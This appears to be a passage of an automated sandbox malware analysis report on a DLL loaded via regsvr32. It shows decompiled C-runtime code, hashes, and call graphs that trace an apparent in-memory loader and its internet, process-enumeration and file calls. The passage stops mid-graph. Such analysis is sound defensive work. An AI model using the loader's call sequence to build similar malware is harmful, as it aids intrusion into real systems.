                                                                    0x7fef9d3cd00
                                                                    0x7fef9d3cd02
                                                                    0x7fef9d3cd0d
                                                                    0x7fef9d3cd0f
                                                                    0x7fef9d3cd14
                                                                    0x7fef9d3cd1a
                                                                    0x7fef9d3cd23
                                                                    0x7fef9d3cd3e
                                                                    0x7fef9d3cd43
                                                                    0x7fef9d3cd53
                                                                    0x7fef9d3cd5f
                                                                    0x7fef9d3cd68
                                                                    0x7fef9d3cd74
                                                                    0x7fef9d3cd97

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: get_int64_arg
                                                                    • String ID: 0$9
                                                                    • API String ID: 1967237116-1975997740
                                                                    • Opcode ID: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                                    • Instruction ID: c0a57250e5e6ff09cb8cd0b3e72d4402f8dee1629557039505579d47a847bcbd
                                                                    • Opcode Fuzzy Hash: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                                    • Instruction Fuzzy Hash: 1E41C87660DAC187E7B58B19E8917AEB7E4F385791F100125EBC886B98DBBDD540CF00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 23%
                                                                    			E000007FE7FEF9D3E70C(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                                                    				signed int _t213;
                                                                    				signed char _t218;
                                                                    				void* _t249;
                                                                    				intOrPtr _t257;
                                                                    				signed int _t331;
                                                                    				signed int _t332;
                                                                    				signed long long _t335;
                                                                    				intOrPtr* _t354;
                                                                    				intOrPtr* _t359;
                                                                    				signed long long _t389;
                                                                    
                                                                    				_t331 = __rax;
                                                                    				_a1220 = 0x27;
                                                                    				_a72 = 0x10;
                                                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
                                                                    				_a84 = 0x30;
                                                                    				_a86 = _a1220 + 0x51;
                                                                    				_a92 = 2;
                                                                    				_a72 = 8;
                                                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
                                                                    				asm("bts eax, 0x9");
                                                                    				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
                                                                    				E000007FE7FEF9D31EA0( &_a1560);
                                                                    				_a1304 = _t331;
                                                                    				goto 0xf9d3e844;
                                                                    				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
                                                                    				E000007FE7FEF9D31EA0( &_a1560);
                                                                    				_a1304 = _t331;
                                                                    				goto 0xf9d3e844;
                                                                    				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
                                                                    				_t332 = E000007FE7FEF9D31E40( &_a1560);
                                                                    				_a1304 = _t332;
                                                                    				goto 0xf9d3e807;
                                                                    				E000007FE7FEF9D31E40( &_a1560);
                                                                    				_a1304 = _t332;
                                                                    				goto 0xf9d3e844;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
                                                                    				E000007FE7FEF9D31E40( &_a1560);
                                                                    				_a1304 = _t332;
                                                                    				goto 0xf9d3e844;
                                                                    				E000007FE7FEF9D31E40( &_a1560);
                                                                    				_a1304 = _t332;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
                                                                    				if (_a1304 >= 0) goto 0xf9d3e87b;
                                                                    				_a1312 =  ~_a1304;
                                                                    				asm("bts eax, 0x8");
                                                                    				goto 0xf9d3e88b;
                                                                    				_t335 = _a1304;
                                                                    				_a1312 = _t335;
                                                                    				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
                                                                    				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
                                                                    				_a1312 = _a1312 & _t335;
                                                                    				if (_a116 >= 0) goto 0xf9d3e8d1;
                                                                    				_a116 = 1;
                                                                    				goto 0xf9d3e8ee;
                                                                    				_a80 = _a80 & 0xfffffff7;
                                                                    				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
                                                                    				_a116 = 0x200;
                                                                    				if (_a1312 != 0) goto 0xf9d3e901;
                                                                    				_a92 = 0;
                                                                    				_a64 =  &_a687;
                                                                    				_t213 = _a116;
                                                                    				_a116 = _a116 - 1;
                                                                    				if (_t213 > 0) goto 0xf9d3e92f;
                                                                    				if (_a1312 == 0) goto 0xf9d3e9cc;
                                                                    				_a1480 = _a72;
                                                                    				_a1296 = _t213 / _a1480 + 0x30;
                                                                    				_a1488 = _a72;
                                                                    				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
                                                                    				_t218 = _a1296 + _a1220;
                                                                    				_a1296 = _t218;
                                                                    				 *_a64 = _a1296 & 0x000000ff;
                                                                    				_a64 = _a64 - 1;
                                                                    				goto 0xf9d3e90e;
                                                                    				_a104 = _t218;
                                                                    				_a64 = _a64 + 1;
                                                                    				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
                                                                    				if (_a104 == 0) goto 0xf9d3ea0b;
                                                                    				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
                                                                    				_a64 = _a64 - 1;
                                                                    				 *_a64 = 0x30;
                                                                    				_a104 = _a104 + 1;
                                                                    				if (_a108 != 0) goto 0xf9d3ec7c;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
                                                                    				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
                                                                    				_a84 = 0x2d;
                                                                    				_a92 = 1;
                                                                    				goto 0xf9d3ea9d;
                                                                    				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
                                                                    				_a84 = 0x2b;
                                                                    				_a92 = 1;
                                                                    				goto 0xf9d3ea9d;
                                                                    				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
                                                                    				_a84 = 0x20;
                                                                    				_a92 = 1;
                                                                    				_a1320 = _a88 - _a104 - _a92;
                                                                    				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
                                                                    				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                    				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                                                    				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
                                                                    				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
                                                                    				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
                                                                    				if (_a76 != 0) goto 0xf9d3ec29;
                                                                    				if (_a104 <= 0) goto 0xf9d3ec29;
                                                                    				_t354 = _a64;
                                                                    				_a1328 = _t354;
                                                                    				_a1336 = _a104;
                                                                    				_a1336 = _a1336 - 1;
                                                                    				if (_a1336 <= 0) goto 0xf9d3ec27;
                                                                    				_t249 = E000007FE7FEF9D26840(_a1336,  &_a120);
                                                                    				_a1496 = _t354;
                                                                    				E000007FE7FEF9D26840(_t249,  &_a120);
                                                                    				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t354 + 0x10c)), _a1496);
                                                                    				if (_a1340 > 0) goto 0xf9d3ebe7;
                                                                    				_a1200 = 0xffffffff;
                                                                    				goto 0xf9d3ec27;
                                                                    				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                                                    				_a1328 = _a1328 + _a1340;
                                                                    				goto 0xf9d3eb61;
                                                                    				goto 0xf9d3ec47;
                                                                    				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                                                    				if (_a1200 < 0) goto 0xf9d3ec7c;
                                                                    				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
                                                                    				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                    				if (_a96 == 0) goto 0xf9d3ec9c;
                                                                    				0xf9d25330();
                                                                    				_a96 = 0;
                                                                    				goto 0xf9d3da75;
                                                                    				if (_a1216 == 0) goto 0xf9d3ecc2;
                                                                    				if (_a1216 == 7) goto 0xf9d3ecc2;
                                                                    				_a1504 = 0;
                                                                    				goto 0xf9d3eccd;
                                                                    				_a1504 = 1;
                                                                    				_t257 = _a1504;
                                                                    				_a1344 = _t257;
                                                                    				if (_a1344 != 0) goto 0xf9d3ed13;
                                                                    				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                    				_a32 = _t359;
                                                                    				r9d = 0;
                                                                    				r8d = 0x8f5;
                                                                    				0xf9d2b3b0();
                                                                    				if (_t257 != 1) goto 0xf9d3ed13;
                                                                    				asm("int3");
                                                                    				if (_a1344 != 0) goto 0xf9d3ed6f;
                                                                    				0xf9d2ab30();
                                                                    				 *_t359 = 0x16;
                                                                    				_a32 = 0;
                                                                    				r9d = 0x8f5;
                                                                    				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                    				_a1376 = 0xffffffff;
                                                                    				E000007FE7FEF9D26800( &_a120);
                                                                    				goto 0xf9d3ed8e;
                                                                    				_a1380 = _a1200;
                                                                    				E000007FE7FEF9D26800( &_a120);
                                                                    				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t389, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                    			}













                                                                    0x7fef9d3e70c
                                                                    0x7fef9d3e70c
                                                                    0x7fef9d3e717
                                                                    0x7fef9d3e72a
                                                                    0x7fef9d3e731
                                                                    0x7fef9d3e740
                                                                    0x7fef9d3e745
                                                                    0x7fef9d3e74f
                                                                    0x7fef9d3e762
                                                                    0x7fef9d3e768
                                                                    0x7fef9d3e77b
                                                                    0x7fef9d3e785
                                                                    0x7fef9d3e78a
                                                                    0x7fef9d3e792
                                                                    0x7fef9d3e7a2
                                                                    0x7fef9d3e7ac
                                                                    0x7fef9d3e7b1
                                                                    0x7fef9d3e7b9
                                                                    0x7fef9d3e7c7
                                                                    0x7fef9d3e7d2
                                                                    0x7fef9d3e7e1
                                                                    0x7fef9d3e7e5
                                                                    0x7fef9d3e7ed
                                                                    0x7fef9d3e7f7
                                                                    0x7fef9d3e7ff
                                                                    0x7fef9d3e807
                                                                    0x7fef9d3e812
                                                                    0x7fef9d3e81c
                                                                    0x7fef9d3e823
                                                                    0x7fef9d3e82b
                                                                    0x7fef9d3e835
                                                                    0x7fef9d3e83c
                                                                    0x7fef9d3e84d
                                                                    0x7fef9d3e858
                                                                    0x7fef9d3e865
                                                                    0x7fef9d3e871
                                                                    0x7fef9d3e879
                                                                    0x7fef9d3e87b
                                                                    0x7fef9d3e883
                                                                    0x7fef9d3e896
                                                                    0x7fef9d3e8a3
                                                                    0x7fef9d3e8b8
                                                                    0x7fef9d3e8c5
                                                                    0x7fef9d3e8c7
                                                                    0x7fef9d3e8cf
                                                                    0x7fef9d3e8d8
                                                                    0x7fef9d3e8e4
                                                                    0x7fef9d3e8e6
                                                                    0x7fef9d3e8f7
                                                                    0x7fef9d3e8f9
                                                                    0x7fef9d3e909
                                                                    0x7fef9d3e90e
                                                                    0x7fef9d3e918
                                                                    0x7fef9d3e91e
                                                                    0x7fef9d3e929
                                                                    0x7fef9d3e934
                                                                    0x7fef9d3e957
                                                                    0x7fef9d3e963
                                                                    0x7fef9d3e990
                                                                    0x7fef9d3e9a2
                                                                    0x7fef9d3e9a4
                                                                    0x7fef9d3e9b8
                                                                    0x7fef9d3e9c2
                                                                    0x7fef9d3e9c7
                                                                    0x7fef9d3e9d9
                                                                    0x7fef9d3e9e5
                                                                    0x7fef9d3e9f5
                                                                    0x7fef9d3e9fc
                                                                    0x7fef9d3ea09
                                                                    0x7fef9d3ea13
                                                                    0x7fef9d3ea1d
                                                                    0x7fef9d3ea26
                                                                    0x7fef9d3ea2f
                                                                    0x7fef9d3ea3e
                                                                    0x7fef9d3ea4b
                                                                    0x7fef9d3ea52
                                                                    0x7fef9d3ea57
                                                                    0x7fef9d3ea5f
                                                                    0x7fef9d3ea6a
                                                                    0x7fef9d3ea71
                                                                    0x7fef9d3ea76
                                                                    0x7fef9d3ea7e
                                                                    0x7fef9d3ea89
                                                                    0x7fef9d3ea90
                                                                    0x7fef9d3ea95
                                                                    0x7fef9d3eaad
                                                                    0x7fef9d3eabd
                                                                    0x7fef9d3eada
                                                                    0x7fef9d3eaf8
                                                                    0x7fef9d3eb06
                                                                    0x7fef9d3eb11
                                                                    0x7fef9d3eb2e
                                                                    0x7fef9d3eb38
                                                                    0x7fef9d3eb43
                                                                    0x7fef9d3eb49
                                                                    0x7fef9d3eb4e
                                                                    0x7fef9d3eb5a
                                                                    0x7fef9d3eb71
                                                                    0x7fef9d3eb7a
                                                                    0x7fef9d3eb85
                                                                    0x7fef9d3eb8a
                                                                    0x7fef9d3eb97
                                                                    0x7fef9d3ebc9
                                                                    0x7fef9d3ebd8
                                                                    0x7fef9d3ebda
                                                                    0x7fef9d3ebe5
                                                                    0x7fef9d3ebff
                                                                    0x7fef9d3ec1a
                                                                    0x7fef9d3ec22
                                                                    0x7fef9d3ec27
                                                                    0x7fef9d3ec42
                                                                    0x7fef9d3ec4f
                                                                    0x7fef9d3ec5a
                                                                    0x7fef9d3ec77
                                                                    0x7fef9d3ec82
                                                                    0x7fef9d3ec8e
                                                                    0x7fef9d3ec93
                                                                    0x7fef9d3ec9c
                                                                    0x7fef9d3eca9
                                                                    0x7fef9d3ecb3
                                                                    0x7fef9d3ecb5
                                                                    0x7fef9d3ecc0
                                                                    0x7fef9d3ecc2
                                                                    0x7fef9d3eccd
                                                                    0x7fef9d3ecd4
                                                                    0x7fef9d3ece3
                                                                    0x7fef9d3ece5
                                                                    0x7fef9d3ecec
                                                                    0x7fef9d3ecf1
                                                                    0x7fef9d3ecf4
                                                                    0x7fef9d3ed06
                                                                    0x7fef9d3ed0e
                                                                    0x7fef9d3ed10
                                                                    0x7fef9d3ed1b
                                                                    0x7fef9d3ed1d
                                                                    0x7fef9d3ed22
                                                                    0x7fef9d3ed28
                                                                    0x7fef9d3ed31
                                                                    0x7fef9d3ed4c
                                                                    0x7fef9d3ed51
                                                                    0x7fef9d3ed61
                                                                    0x7fef9d3ed6d
                                                                    0x7fef9d3ed76
                                                                    0x7fef9d3ed82
                                                                    0x7fef9d3eda5

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: get_int64_arg
                                                                    • String ID: '$9
                                                                    • API String ID: 1967237116-1823400153
                                                                    • Opcode ID: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                                    • Instruction ID: 29668378713c93b892a0041d725b85e979c1ad93fe9cb8202607dd12c91b0faa
                                                                    • Opcode Fuzzy Hash: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                                    • Instruction Fuzzy Hash: 0241C33660DA858AE7A18B19E8407AFB3E4F7C5752F100125E6D8C6AE8EBBDD4408F14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: DecodePointer
                                                                    • String ID: 0*C$@'C
                                                                    • API String ID: 3527080286-3870386435
                                                                    • Opcode ID: 44cb388d9b870140d99a40c9b372f402bf81f41f696d4103a424b7cff1120763
                                                                    • Instruction ID: b357231f8f0063d758982780f1c63af601305b6eea545ef6037656fa00afa9a2
                                                                    • Opcode Fuzzy Hash: 44cb388d9b870140d99a40c9b372f402bf81f41f696d4103a424b7cff1120763
                                                                    • Instruction Fuzzy Hash: 64411625A0AA4A92EBA09B19EC4537E23E0F785784FB15132D5CD077B5CF7EE8018745
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _unlock
                                                                    • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgdel.cpp
                                                                    • API String ID: 2480363372-1749241151
                                                                    • Opcode ID: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                                    • Instruction ID: 04ee9255729ef7e149dbf43242f730f4bbed3ff16cc2c5ac2558ad9c7efde415
                                                                    • Opcode Fuzzy Hash: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                                    • Instruction Fuzzy Hash: BC113D7AA2868686EBE49B94DC41B6D63E1F780755F205035E68E43BA4CB3DE404CF01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: DestroyedExceptionFindFrameObjectUnlink
                                                                    • String ID: csm
                                                                    • API String ID: 1826589669-1018135373
                                                                    • Opcode ID: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                                    • Instruction ID: 9f3dc625307ec028be1fda2cc305f99b8c00c3b4febe2b6a2618c0b56fcdacc0
                                                                    • Opcode Fuzzy Hash: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                                    • Instruction Fuzzy Hash: 61114232944681CADFA0DF79C8812BD27E4F795B88F615135EA5D877B1CB26D981C300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _free_nolock
                                                                    • String ID: ("Corrupted pointer passed to _freea", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\malloc.h
                                                                    • API String ID: 2882679554-3458198949
                                                                    • Opcode ID: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                                    • Instruction ID: d33f1896f8d52307a9012ea76dc3fce74adc3acb1f5112dbea688671cc213a85
                                                                    • Opcode Fuzzy Hash: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                                    • Instruction Fuzzy Hash: 3B01F431A1C78286EBD09B6AE88576EB3D4F390350F614535E6CD43FA9DBBED4058B01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:16.2%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:4%
                                                                    Total number of Nodes:99
                                                                    Total number of Limit Nodes:14
                                                                    execution_graph 4060 1800178f4 4063 18000ffc0 4060->4063 4062 180017924 4068 18001000e 4063->4068 4067 1800116b2 4067->4062 4068->4067 4071 18002975c 4068->4071 4075 180015774 4068->4075 4079 1800078a4 4068->4079 4083 180007eb4 4068->4083 4087 18001667c 4068->4087 4073 1800297af 4071->4073 4074 180029f99 4073->4074 4095 18000c758 4073->4095 4074->4068 4077 1800157bd 4075->4077 4078 1800157fb 4077->4078 4111 1800027f8 4077->4111 4078->4068 4082 1800078c0 4079->4082 4081 1800079e2 4081->4068 4082->4081 4118 18001705c 4082->4118 4086 180007ee1 4083->4086 4085 180008118 4085->4068 4086->4085 4129 180011ef8 4086->4129 4092 1800166ac 4087->4092 4091 180016ad3 4091->4068 4092->4091 4132 180023624 4092->4132 4136 180018bdc 4092->4136 4140 18000bc98 4092->4140 4144 18001aec8 4092->4144 4148 1800270c0 4092->4148 4101 18000c7dc 4095->4101 4096 18000c9b5 4102 18002446c 4096->4102 4097 18000c84b 4097->4073 4101->4096 4101->4097 4105 1800149cc 4101->4105 4108 180016500 4101->4108 4103 1800244af 4102->4103 4104 180024558 InternetOpenW 4103->4104 4104->4097 4107 180014a4c 4105->4107 4106 180014ae5 HttpOpenRequestW 4106->4101 4107->4106 4110 18001657b 4108->4110 4109 18001663c InternetConnectW 4109->4101 4110->4109 4114 180006f2c 4111->4114 4113 18000289c 4113->4077 4115 180006f5d 4114->4115 4116 180007250 Process32NextW 4115->4116 4117 180006fbc 4115->4117 4116->4115 4117->4113 4120 18001707b 4118->4120 4121 1800172eb 4120->4121 4122 180028348 4120->4122 4121->4082 4123 180028431 4122->4123 4124 180028607 4123->4124 4126 180017bf8 4123->4126 4124->4120 4128 180017c7c 4126->4128 4127 180017d21 GetVolumeInformationW 4127->4124 4128->4127 4131 180011f57 4129->4131 4130 180012017 CreateThread 4130->4085 4131->4130 4134 180023662 4132->4134 4133 180023683 4133->4092 4134->4133 4152 180018628 4134->4152 4138 180018c18 4136->4138 4137 180011ef8 CreateThread 4137->4138 4138->4137 4139 180018f32 4138->4139 4139->4092 4142 18000bcde 4140->4142 4141 18000c521 4141->4092 4142->4141 4143 180018628 CreateFileW 4142->4143 4143->4142 4146 18001aef6 4144->4146 4145 180011ef8 CreateThread 4145->4146 4146->4145 4147 18001b239 4146->4147 4147->4092 4150 180027157 4148->4150 4149 180027fe1 4149->4092 4150->4149 4151 180018628 CreateFileW 4150->4151 4151->4150 4153 180018660 4152->4153 4155 180018943 4153->4155 4156 18001bf0c 4153->4156 4155->4134 4158 18001bf8e 4156->4158 4157 18001c031 CreateFileW 4157->4153 4158->4157 4159 130000 4160 130183 4159->4160 4161 13043e VirtualAlloc 4160->4161 4164 130462 4161->4164 4162 130531 GetNativeSystemInfo 4163 13056d VirtualAlloc 4162->4163 4165 130a00 4162->4165 4167 13058b 4163->4167 4164->4162 4164->4165 4166 1309d9 VirtualProtect 4166->4167 4167->4165 4167->4166 4167->4167 4168 180011ef8 4170 180011f57 4168->4170 4169 180012017 CreateThread 4170->4169 4171 180018628 4172 180018660 4171->4172 4173 18001bf0c CreateFileW 4172->4173 4174 180018943 4172->4174 4173->4172 4175 18000c819 4179 18000c80c 4175->4179 4176 18000c9b5 4177 18002446c InternetOpenW 4176->4177 4180 18000c84b 4177->4180 4178 1800149cc HttpOpenRequestW 4178->4179 4179->4175 4179->4176 4179->4178 4179->4180 4181 180016500 InternetConnectW 4179->4181 4181->4179

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 130000-130460 call 130aa8 * 2 VirtualAlloc 22 130462-130466 0->22 23 13048a-130494 0->23 24 130468-130488 22->24 26 130a91-130aa6 23->26 27 13049a-13049e 23->27 24->23 24->24 27->26 28 1304a4-1304a8 27->28 28->26 29 1304ae-1304b2 28->29 29->26 30 1304b8-1304bf 29->30 30->26 31 1304c5-1304d2 30->31 31->26 32 1304d8-1304e1 31->32 32->26 33 1304e7-1304f4 32->33 33->26 34 1304fa-130507 33->34 35 130531-130567 GetNativeSystemInfo 34->35 36 130509-130511 34->36 35->26 38 13056d-130589 VirtualAlloc 35->38 37 130513-130518 36->37 39 130521 37->39 40 13051a-13051f 37->40 41 1305a0-1305ac 38->41 42 13058b-13059e 38->42 43 130523-13052f 39->43 40->43 44 1305af-1305b2 41->44 42->41 43->35 43->37 46 1305c1-1305db 44->46 47 1305b4-1305bf 44->47 48 13061b-130622 46->48 49 1305dd-1305e2 46->49 47->44 51 1306db-1306e2 48->51 52 130628-13062f 48->52 50 1305e4-1305ea 49->50 53 13060b-130619 50->53 54 1305ec-130609 50->54 56 130864-13086b 51->56 57 1306e8-1306f9 51->57 52->51 55 130635-130642 52->55 53->48 53->50 54->53 54->54 55->51 60 130648-13064f 55->60 58 130871-13087f 56->58 59 130917-130929 56->59 61 130702-130705 57->61 64 13090e-130911 58->64 62 130a07-130a1a 59->62 63 13092f-130937 59->63 65 130654-130658 60->65 66 130707-13070a 61->66 67 1306fb-1306ff 61->67 90 130a40-130a4a 62->90 91 130a1c-130a27 62->91 69 13093b-13093f 63->69 64->59 68 130884-1308a9 64->68 70 1306c0-1306ca 65->70 71 130788-13078e 66->71 72 13070c-13071d 66->72 67->61 95 130907-13090c 68->95 96 1308ab-1308b1 68->96 76 130945-13095a 69->76 77 1309ec-1309fa 69->77 74 13065a-130669 70->74 75 1306cc-1306d2 70->75 73 130794-1307a2 71->73 72->73 78 13071f-130720 72->78 80 1307a8 73->80 81 13085d-13085e 73->81 86 13066b-130678 74->86 87 13067a-13067e 74->87 75->65 82 1306d4-1306d5 75->82 84 13097b-13097d 76->84 85 13095c-13095e 76->85 77->69 88 130a00-130a01 77->88 89 130722-130784 78->89 92 1307ae-1307d4 80->92 81->56 82->51 100 1309a2-1309a4 84->100 101 13097f-130981 84->101 97 130960-13096c 85->97 98 13096e-130979 85->98 99 1306bd-1306be 86->99 102 130680-13068a 87->102 103 13068c-130690 87->103 88->62 89->89 104 130786 89->104 93 130a7b-130a8e 90->93 94 130a4c-130a54 90->94 105 130a38-130a3e 91->105 127 1307d6-1307d9 92->127 128 130835-130839 92->128 93->26 94->93 107 130a56-130a78 94->107 95->64 116 1308b3-1308b9 96->116 117 1308bb-1308c8 96->117 